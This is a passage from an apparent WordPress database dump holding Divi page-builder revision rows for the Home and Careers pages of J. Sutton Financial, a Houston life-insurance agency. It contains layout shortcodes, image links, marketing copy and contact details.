badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-02 19:58:33','2023-04-02 19:58:33','',38,'http://cmdev-site1.com/?p=646',0,'revision','',0),(670,3,'2023-04-03 12:33:15','2023-04-03 12:33:15','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"709.9px\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2>Want to know how much insurance you need?</h2>[/et_pb_text][dsm_button button_one_text=\"Get a Quote today!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-03 12:33:15','2023-04-03 12:33:15','',138,'http://cmdev-site1.com/?p=670',0,'revision','',0),(665,3,'2023-04-03 12:20:09','2023-04-03 12:20:09','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\" min_height=\"709.9px\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2>Want to know how much insurance you need?</h2>[/et_pb_text][dsm_button button_one_text=\"Get a Quote today!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" 